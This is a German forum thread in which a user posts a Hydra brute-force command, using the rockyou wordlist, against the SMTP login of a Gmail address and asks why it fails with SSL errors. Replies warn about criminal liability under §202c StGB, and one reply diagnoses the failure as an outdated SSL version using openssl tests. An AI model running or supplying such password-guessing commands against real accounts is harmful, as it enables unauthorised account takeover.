Benutzung von Hydra

Hi,
Ich bin der Jürgen aus Berlin [snip]
Im Kommandofenster von Windows 10 habe ich das Kommando hydra -l mailaccount@gmail.com -P \users\jschu\Downloads\rockyou\rockyou.txt -s 465 -S -v -V -t 1 smtp.gmail.com smtp ausgeführt.
Es kommen bei jedem Passwortversuch die Meldungen:
[ATTEMPT] target smtp.gmail.com - login "mailaccount@gmail.com" - pass "ciaran" - 5335 of 14344527 [child 0]
[VERBOSE] Could not create an SSL session: error:14077102:SSL routines:SSL23_GET_SERVER_HELLO:unsupported protocol
[ERROR] Child with pid 8608 terminating, can not connect


Die Meldungen irretieren mich ein wenig weil immer die gleiche Error Meldung dabei ist und die pid ist immer unterschiedlich.
Vielleicht gibt es ja hier jemanden der mir das erklären kann.
Sollte mein Thema in der falschen Rubrik plaziert sein, so möchte ich das im voraus entschuldigen.

Vielen Dank im voraus
 
Zuletzt bearbeitet von einem Moderator:
Hey,
ich würde dir zunächst raten diese Frage umzuformulieren, da sie Straftat als Hintergrund hat, und keiner in diesem Board dazu helfen wird.
Jedoch zu eigenen recherche Zwecken, wie leicht es ist, sein eigenes Mailkonto zu hacken, könnte hilfreichere Kommentare erbringen.

Viele Grüße
 
Da Hydra Sicherheitsvorkehrungen umgehen kann, muss es nach Inkrafttreten des sogenannten Hackerparagrafen (§202c StGB) in Deutschland als Computerprogramm zum Ausspähen von Daten aufgefasst werden. Somit kann die illegale Benutzung der Software unter Strafe gestellt werden. Für legale Zwecke, z.B. die Austestung des eigenen Sicherheitssystems, kann Hydra genutzt werden.

Dies gilt auch für die eigene Mailadresse, sofern sie nicht auf dem eigenen Mailserver liegt.
Ansonsten wird von den meisten Anbietern vor der Nutzung von SMTP eine Verbindung per POP3 oder eben eine bestehende IMAP-Verbindung verlangt.

Gruß

PS: Meinst du nicht, dass es ziemlich blöd ist Google anzugreifen mit einem Programm, welches du über Google gefunden hast? :wink:
Also lass es lieber, die haben nicht nur die besseren Anwälte sondern auch mehr Ahnung.
 
[VERBOSE] Could not create an SSL session: error:14077102:SSL routines:SSL23_GET_SERVER_HELLO:unsupported protocol
[ERROR] Child with pid 8608 terminating, can not connect[/B]

Die Meldungen irretieren mich ein wenig weil immer die gleiche Error Meldung dabei ist und die pid ist immer unterschiedlich.
Vielleicht gibt es ja hier jemanden der mir das erklären kann.
SSL v3 (von v2 ganz zu schweigen) gilt schon seit ein paar Jahren als veraltet.

Code:
% openssl s_client -connect smtp.gmail.com:465 -tls1 
...
    Start Time: 1494758338
    Timeout   : 7200 (sec)
    Verify return code: 0 (ok)
---
220 smtp.gmail.com ESMTP m201sm13395731wmd.15 - gsmtp

%openssl s_client -connect smtp.gmail.com:465 -ssl2                       
CONNECTED(00000005)
34383111576:error:1407F0E5:SSL routines:ssl2_write:ssl handshake failure:s2_pkt.c:412:
---
no peer certificate available
---
No client certificate CA names sent
 
Zurück
Oben